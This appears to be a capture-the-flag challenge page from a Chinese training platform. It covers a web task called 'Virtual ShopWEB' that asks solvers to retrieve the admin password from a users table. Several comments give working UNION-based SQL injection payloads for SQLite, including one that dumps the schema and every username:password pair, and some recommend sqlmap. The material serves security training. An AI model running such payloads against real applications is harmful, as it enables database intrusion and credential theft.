Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
129
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
17325012375 攻破了该题 1天前
mmzp 攻破了该题 5天前
Zt0312 攻破了该题 6天前
xiongzhi 攻破了该题 12天前
yan8925298 攻破了该题 13天前
xiaoxiao972521 攻破了该题 17天前
平凡的人 攻破了该题 18天前
2362821788 攻破了该题 20天前
dajijiji 攻破了该题 21天前
1656136108 攻破了该题 26天前
hncp202 攻破了该题 27天前
learningfish 攻破了该题 28天前
2837740467 攻破了该题 29天前
6688 攻破了该题 1月前
cskdpl 攻破了该题 1月前
kkk12138 攻破了该题 1月前
不要不要 攻破了该题 1月前
BusyMsJs 攻破了该题 1月前
thy6666 攻破了该题 1月前
评论
15614005380 2月前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 3月前
举报
union查询
xiaobai568 4月前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 4月前
举报
sqlmap即可
chaoge 5月前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 6月前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 6月前
举报
sqlmap一下子就出来了
hopeinhand 7月前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了